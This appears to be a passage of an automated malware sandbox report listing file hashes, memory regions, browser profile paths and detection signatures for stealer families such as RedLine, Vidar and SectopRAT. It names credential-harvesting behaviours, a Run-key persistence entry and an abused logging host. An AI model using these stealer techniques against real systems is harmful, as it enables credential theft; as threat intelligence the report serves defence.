| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 01ad10e59fa396af2d5443c5a14c1b21 |
| SHA1 | f209a4f0bb2a96e3ee6a55689e7f00e79c04f722 |
| SHA256 | bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137 |
| SHA512 | 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02 |
memory/2968-138-0x0000000000A00000-0x0000000000A10000-memory.dmp
memory/2488-149-0x0000000000400000-0x00000000004E4000-memory.dmp
memory/1516-162-0x00000000009D0000-0x0000000000AB4000-memory.dmp
memory/396-172-0x0000000000400000-0x0000000000BD8000-memory.dmp
memory/396-181-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/396-180-0x0000000064940000-0x0000000064959000-memory.dmp
memory/396-179-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/396-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/396-176-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2936-182-0x0000000000400000-0x0000000002C6D000-memory.dmp
memory/4464-183-0x0000000001400000-0x0000000001412000-memory.dmp
C:\ProgramData\softokn3.dll
| MD5 | a378c450e6ad9f1e0356ed46da190990 |
| SHA1 | d457a2c162391d2ea30ec2dc62c8fb3b973f6a66 |
| SHA256 | b745b0c0db87a89de5e542e9ae0a06f585793ac3f4240bff3524e7dbdba79978 |
| SHA512 | e6cdc8f570af97e48b1d8968730db0afc46f9dd6ad7366a936a5518801debb61c86cc61526e5e26e7ad3b3daeb76a19b32d7c0da33140597f6d19163683c12b5 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Login Data For Account
| MD5 | a182561a527f929489bf4b8f74f65cd7 |
| SHA1 | 8cd6866594759711ea1836e86a5b7ca64ee8911f |
| SHA256 | 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914 |
| SHA512 | 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | b50765fc873de01b9b93ef8908a5cf55 |
| SHA1 | 0901ef992a9e9ddd54ee41f87cfbb86b1755ea1d |
| SHA256 | ad7f3e95c541c12a952b76631045e63f1ea53d414b4273df5226c85c218cf1df |
| SHA512 | 7ca11d4aa67ef7f39848ed768d5bf5996857aaf78992b3d73cd932b8c5682f5f84afaab14da4a43cda01398c1c87895f02bb135803bffef2130e09bb88b58be1 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Code Cache\wasm\index
| MD5 | 54cb446f628b2ea4a5bce5769910512e |
| SHA1 | c27ca848427fe87f5cf4d0e0e3cd57151b0d820d |
| SHA256 | fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d |
| SHA512 | 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\000003.log
| MD5 | 891a884b9fa2bff4519f5f56d2a25d62 |
| SHA1 | b54a3c12ee78510cb269fb1d863047dd8f571dea |
| SHA256 | e2610960c3757d1757f206c7b84378efa22d86dcf161a98096a5f0e56e1a367e |
| SHA512 | cd50c3ee4dfb9c4ec051b20dd1e148a5015457ee0c1a29fff482e62291b32097b07a069db62951b32f209fd118fd77a46b8e8cc92da3eaae6110735d126a90ee |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extension Scripts\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
memory/1828-389-0x0000000000400000-0x0000000002CC9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en_CA\messages.json
| MD5 | 07ffbe5f24ca348723ff8c6c488abfb8 |
| SHA1 | 6dc2851e39b2ee38f88cf5c35a90171dbea5b690 |
| SHA256 | 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c |
| SHA512 | 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\manifest.json
| MD5 | f0b8f439874eade31b42dad090126c3e |
| SHA1 | 9011bca518eeeba3ef292c257ff4b65cba20f8ce |
| SHA256 | 20d39e65b119ed47afd5942d2a67e5057e34e2aef144569796a19825fea4348e |
| SHA512 | 833e3e30f091b4e50364b10fc75258e8c647ddd3f32d473d1991beda0095827d02f010bf783c22d8f8a3fa1433b6b22400ad93dc34b0eb59a78e1e18e7d9b05f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\aes.js
| MD5 | 4ff108e4584780dce15d610c142c3e62 |
| SHA1 | 77e4519962e2f6a9fc93342137dbb31c33b76b04 |
| SHA256 | fc7e184beeda61bf6427938a84560f52348976bb55e807b224eb53930e97ef6a |
| SHA512 | d6eee0fc02205a3422c16ad120cad8d871563d8fcd4bde924654eac5a37026726328f9a47240cf89ed6c9e93ba5f89c833e84e65eee7db2b4d7d1b4240deaef2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\jquery-3.3.1.min.js
| MD5 | a09e13ee94d51c524b7e2a728c7d4039 |
| SHA1 | 0dc32db4aa9c5f03f3b38c47d883dbd4fed13aae |
| SHA256 | 160a426ff2894252cd7cebbdd6d6b7da8fcd319c65b70468f10b6690c45d02ef |
| SHA512 | f8da8f95b6ed33542a88af19028e18ae3d9ce25350a06bfc3fbf433ed2b38fefa5e639cddfdac703fc6caa7f3313d974b92a3168276b3a016ceb28f27db0714a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\mode-ecb.js
| MD5 | 23231681d1c6f85fa32e725d6d63b19b |
| SHA1 | f69315530b49ac743b0e012652a3a5efaed94f17 |
| SHA256 | 03164b1ac43853fecdbf988ce900016fb174cf65b03e41c0a9a7bf3a95e8c26a |
| SHA512 | 36860113871707a08401f29ab2828545932e57a4ae99e727d8ca2a9f85518d3db3a4e5e4d46ac2b6ba09494fa9727c033d77c36c4bdc376ae048541222724bc2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\pad-nopadding.js
| MD5 | 0f26002ee3b4b4440e5949a969ea7503 |
| SHA1 | 31fc518828fe4894e8077ec5686dce7b1ed281d7 |
| SHA256 | 282308ebc3702c44129438f8299839ca4d392a0a09fdf0737f08ef1e4aff937d |
| SHA512 | 4290a1aee5601fcbf1eb2beec9b4924c30cd218e94ae099b87ba72c9a4fa077e39d218fc723b8465d259028a6961cc07c0cd6896aa2f67e83f833ca023a80b11 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\content.js
| MD5 | dd274022b4205b0da19d427b9ac176bf |
| SHA1 | 91ee7c40b55a1525438c2b1abe166d3cb862e5cb |
| SHA256 | 41e129bb90c2ac61da7dac92a908559448c6448ba698a450b6e7add9493739c6 |
| SHA512 | 8ee074da689a7d90eca3c8242f7d16b0390b8c9b133d7bbdef77f8bf7f9a912e2d60b4a16f1c934f1bd38b380d6536c23b3a2f9939e31a8ef9f9c539573387b4 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\js\background.js
| MD5 | 2098797393986a512c91cc3508a6a1d3 |
| SHA1 | d0b403c8b63d4ae203c71a4f2aa868d4099fb059 |
| SHA256 | 4f7c1f1bb05ee85f65f3263a5cb353d04cc574013ed0f17640642ce2c953be33 |
| SHA512 | faf434ccb8eac865601ab86585b483a423f6d9949d0fd04635425c2c272fea901bb99dc7fbfc0a79a0fbeb59e30a2a2b48381b713a14399ee31b22effccc6bdb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\icon.png
| MD5 | c8d8c174df68910527edabe6b5278f06 |
| SHA1 | 8ac53b3605fea693b59027b9b471202d150f266f |
| SHA256 | 9434dd7008059a60d6d5ced8c8a63ab5cae407e7152da98ca4dda408510f08f5 |
| SHA512 | d439e5124399d1901934319535b7156c0ca8d76b5aa4ddf1dd0b598d43582f6d23c16f96be74d3cd5fe764396da55ca51811d08695f356f12f7a8a71bcc7e45c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\kjkfjbddnkpfcflenfcleijhgaaiapaf\8.66.88_0\background.html
| MD5 | 9ffe618d587a0685d80e9f8bb7d89d39 |
| SHA1 | 8e9cae42c911027aafae56f9b1a16eb8dd7a739c |
| SHA256 | a1064146f622fe68b94cd65a0e8f273b583449fbacfd6fd75fec1eaaf2ec8d6e |
| SHA512 | a4e1f53d1e3bf0ff6893f188a510c6b3da37b99b52ddd560d4c90226cb14de6c9e311ee0a93192b1a26db2d76382eb2350dc30ab9db7cbd9ca0a80a507ea1a12 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB\messages.json
| MD5 | 91f5bc87fd478a007ec68c4e8adf11ac |
| SHA1 | d07dd49e4ef3b36dad7d038b7e999ae850c5bef6 |
| SHA256 | 92f1246c21dd5fd7266ebfd65798c61e403d01a816cc3cf780db5c8aa2e3d9c9 |
| SHA512 | fdc2a29b04e67ddbbd8fb6e8d2443e46badcb2b2fb3a850bbd6198cdccc32ee0bd8a9769d929feefe84d1015145e6664ab5fea114df5a864cf963bf98a65ffd9 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_2
| MD5 | 0962291d6d367570bee5454721c17e11 |
| SHA1 | 59d10a893ef321a706a9255176761366115bedcb |
| SHA256 | ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7 |
| SHA512 | f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_3
| MD5 | 41876349cb12d6db992f1309f22df3f0 |
| SHA1 | 5cf26b3420fc0302cd0a71e8d029739b8765be27 |
| SHA256 | e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c |
| SHA512 | e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\index
| MD5 | 95c07d8a71623f41508b2ff47ca82226 |
| SHA1 | d4ad0917270a5006f3be6ca2b19e003d2522ea23 |
| SHA256 | 824639e8587bd6deccb361cd6ccf061e82b76e97745b4cdaf09cf22cf59f4452 |
| SHA512 | e0315b36ce709657de426e5f549864a1de635e86c174379d36757d7deb300a11ac40d5938a32f00e304a1a41c9e5f2eb7806296c898642ffc3b187041c9ad9a9 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\GPUCache\data_0
| MD5 | cf89d16bb9107c631daabf0c0ee58efb |
| SHA1 | 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b |
| SHA256 | d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e |
| SHA512 | 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Shared Dictionary\db
| MD5 | 491de38f19d0ae501eca7d3d7d69b826 |
| SHA1 | 2ecf6fcf189ce6d35139daf427a781ca66a1eba9 |
| SHA256 | e58156bca5288238d341f5249d3b6c91ab37cef515358953b435339100d0596a |
| SHA512 | 232f5df71e8ec35e500ac81aa54a87b3523fe8a32168096a2a76f08e5c7868100b3cdc5155786ead489aac440beee3f84ffa43d226a5b709c66012923b20c696 |
C:\ProgramData\3IDCO9XFIKIC3QYMVB9RPALMC\files\temp
| MD5 | f310cf1ff562ae14449e0167a3e1fe46 |
| SHA1 | 85c58afa9049467031c6c2b17f5c12ca73bb2788 |
| SHA256 | e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855 |
| SHA512 | 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad |
C:\ProgramData\3IDCO9XFIKIC3QYMVB9RPALMC\files\temp
| MD5 | 013b18b14247306181ec7ae01d24aa15 |
| SHA1 | 5ce4cb396bf23585fbcae7a9733fe0f448646313 |
| SHA256 | edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44 |
| SHA512 | 2035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94 |
C:\ProgramData\3IDCO9XFIKIC3QYMVB9RPALMC\files\temp
| MD5 | 54ad0d820f5eedc3ccb93a548fca33fc |
| SHA1 | 378ab33d0a1fa2ec748c893d68c279a2073dd2d7 |
| SHA256 | 28e8d4844e25f157663e4e4a95e038dd0a5f27bc14f41ac40e74bb184401936b |
| SHA512 | 6d23c8f73645bb2c6860dda462dafe443ab98b32e11be3ea808c92ec84fa706da36dc19c595145d76528ed314a4119caaa3e085438ec0ffe7a9cced4f8b36ddc |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\CrashpadMetrics-active.pma
| MD5 | 9a31b075da019ddc9903f13f81390688 |
| SHA1 | d5ed5d518c8aad84762b03f240d90a2d5d9d99d3 |
| SHA256 | 95cf4025babcd46069b425449c98ed15d97d364b2461417caa9aa0c13cb372e1 |
| SHA512 | a04726a429ae727d685f0836327c625d2f18d6327253216a9a31265a324b68b06bec4e7f1b744d261a0e67fa0a90c43719aeda9d2998f42525b0ff5640c7bf1e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad\settings.dat
| MD5 | 73d076263128b1602fe145cd548942d0 |
| SHA1 | 69fe6ab6529c2d81d21f8c664da47c16c2e663ae |
| SHA256 | f2dd7199b48e34d54ee1a221f654ad9c04d8b606c02bdbe77b33b82fb2df6b29 |
| SHA512 | e371083407ee6a1e3436a3d1ea4e6a84f211c6ad7c501f7a09916a9ada5b50a39dcb9e8be7a4dee664ea88ec33be8c6197c2f0ac2eabe3c0691bc9d0ed4e415d |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Local State
| MD5 | fdc7bea6a36bb1cb2854aabb274db951 |
| SHA1 | 7dd44a949762b9fb990f798c2df8238d8cf75b21 |
| SHA256 | 7d1ebfa1108c3826ab40627060d1b3f67a36aea8b1e10c590783822862f16e93 |
| SHA512 | 2751e0010301b4a415af57319cce4ca28ff55ff96e5d95883829705b0a4b916a94570b938eb51c60623f70197c030e8c86d4b4cba3d3daafa38345895c8cfd47 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\segmentation_platform\ukm_db
| MD5 | 3979944f99b92e44fa4b7dbcb6ee91c2 |
| SHA1 | df2161c70a820fe43801320f1c25182f891261a4 |
| SHA256 | 001d755b2b560945440023bf4ebfbda797cf5106419ac7dd270924b322f3ecf3 |
| SHA512 | 358e6dee698a63c2490c2fb5206516766fd8ace8f3d523509c29ff76aa6a984cb6381468f15bb4b9c084d9a470298b4cc11b0970e671ce0316243069ac4c8590 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\ShaderCache\index
| MD5 | 623219f1ab995d4382d51862e296993e |
| SHA1 | ab714b5455c3a03280ede906b0341270e5e2b4c3 |
| SHA256 | e50e0bfc2a799dd9fe24d78ab3838d53b4369a435b883918876435c47acf9a78 |
| SHA512 | cf7ea8ed4c3584195803b511b9034695c7ee18d133ed63f51da5e407cc87a90905a2e6264116f67ddb4d0ccc2fff634521906eb04d46250930a6cc19929fd9aa |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Last Version
| MD5 | ef48733031b712ca7027624fff3ab208 |
| SHA1 | da4f3812e6afc4b90d2185f4709dfbb6b47714fa |
| SHA256 | c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99 |
| SHA512 | ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029 |
memory/1516-1380-0x0000000000B70000-0x0000000000C4D000-memory.dmp
memory/2968-1441-0x0000000001430000-0x000000000143E000-memory.dmp
memory/2968-1442-0x0000000001460000-0x0000000001472000-memory.dmp
memory/4464-1453-0x0000000009330000-0x00000000093BC000-memory.dmp
memory/4464-1454-0x0000000008220000-0x000000000823E000-memory.dmp
memory/1428-1455-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1828-1458-0x0000000004A40000-0x0000000004A76000-memory.dmp
memory/1828-1461-0x00000000050F0000-0x0000000005718000-memory.dmp
memory/1428-1462-0x00000000055E0000-0x0000000005BF8000-memory.dmp
memory/1428-1463-0x0000000005070000-0x0000000005082000-memory.dmp
memory/1428-1464-0x00000000050D0000-0x000000000510C000-memory.dmp
memory/1828-1465-0x0000000005870000-0x0000000005892000-memory.dmp
memory/1428-1466-0x0000000005110000-0x000000000515C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttbjl2fr.sfy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1828-1472-0x0000000005910000-0x0000000005976000-memory.dmp
memory/1828-1474-0x0000000005980000-0x00000000059E6000-memory.dmp
memory/1828-1480-0x0000000005B30000-0x0000000005E84000-memory.dmp
memory/1428-1481-0x0000000005380000-0x000000000548A000-memory.dmp
memory/1828-1482-0x0000000005FC0000-0x0000000005FDE000-memory.dmp
memory/1828-1484-0x0000000074CC0000-0x0000000074D0C000-memory.dmp
memory/1828-1483-0x0000000006590000-0x00000000065C2000-memory.dmp
memory/1828-1494-0x00000000065D0000-0x00000000065EE000-memory.dmp
memory/1828-1495-0x00000000071D0000-0x0000000007273000-memory.dmp
memory/1828-1497-0x0000000007930000-0x0000000007FAA000-memory.dmp
memory/1828-1498-0x00000000072E0000-0x00000000072FA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e443ee4336fcf13c698b8ab5f3c173d0 |
| SHA1 | 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a |
| SHA256 | 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b |
| SHA512 | cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd |
memory/1828-1504-0x0000000007360000-0x000000000736A000-memory.dmp
memory/1828-1505-0x0000000007560000-0x00000000075F6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56a4f78e21616a6e19da57228569489b |
| SHA1 | 21bfabbfc294d5f2aa1da825c5590d760483bc76 |
| SHA256 | d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb |
| SHA512 | c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b |
memory/1828-1516-0x00000000074E0000-0x00000000074F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4df1f8c317d3d33cdc2dfebcbc885d1a |
| SHA1 | abdfa86349ad80655137c78c7febf9d541921550 |
| SHA256 | c0f99364290d48d014583bce813ac08562a0e6bc76e3312ae0277ef9e7340cab |
| SHA512 | d448c472372b1e639746d9d6ba23946001a7856b8e0ef1dc2a3f18321bad2d9d2e6a925736c76dd5c1eb77ce698631a900106360360bdf1a00dbf6fcd5264cd1 |
memory/1828-1522-0x0000000007510000-0x000000000751E000-memory.dmp
memory/1828-1523-0x0000000007520000-0x0000000007534000-memory.dmp
memory/1828-1524-0x0000000007620000-0x000000000763A000-memory.dmp
memory/1828-1525-0x0000000007600000-0x0000000007608000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0e00900d659ac243044b597cd7c30c69 |
| SHA1 | b875c0ef5a85ec00b53c828b3116d81c70d6de6f |
| SHA256 | c774e13a4f914b797aa80e5f0532035b869f256a4b25b5481a8fe6f236bd81cf |
| SHA512 | 400ec5693c17a7b11e74ff3baf6e1ed8ec95a6d7c1c4a673e0aa78ee958c6a205fdd549cf2eaf5aed808c46f3958156cf6fcdf9529026de882b50cea814c6822 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0769ac90a2c4d32e1062e8b25fabffdd |
| SHA1 | 5197d5b2fd40340efb5f4ff4516d905b7348a7d6 |
| SHA256 | 7bf1c7f661ce582ebe1c9668d3a22a47e5cee9e9c23415a70bac3206e9698614 |
| SHA512 | 9fa54f33976e9b41ed4af119409269038ed04946260df1ea2d0d916b9d0c53912d94f627b377f13b2ba3372a5de756c87090c6bce3cb6488911f7ff0af25ca6a |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | be0b4b1c809dc419f44b990378cbae31 |
| SHA1 | 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806 |
| SHA256 | 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53 |
| SHA512 | 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24 |
memory/6020-1571-0x0000000000A90000-0x0000000000A96000-memory.dmp
memory/5188-1573-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5188-1576-0x00000000010E0000-0x0000000001100000-memory.dmp
memory/5188-1575-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5188-1578-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5188-1581-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5188-1579-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5188-1577-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5188-1580-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5188-1583-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5188-1584-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5188-1613-0x0000000140000000-0x0000000140786000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 4bc8a3540a546cfe044e0ed1a0a22a95 |
| SHA1 | 5387f78f1816dee5393bfca1fffe49cede5f59c1 |
| SHA256 | f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca |
| SHA512 | e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-25 09:33
Reported
2024-11-25 09:36
Platform
win7-20241010-en
Max time kernel
59s
Max time network
150s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zSCD9986B6\08240101651be7e1.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
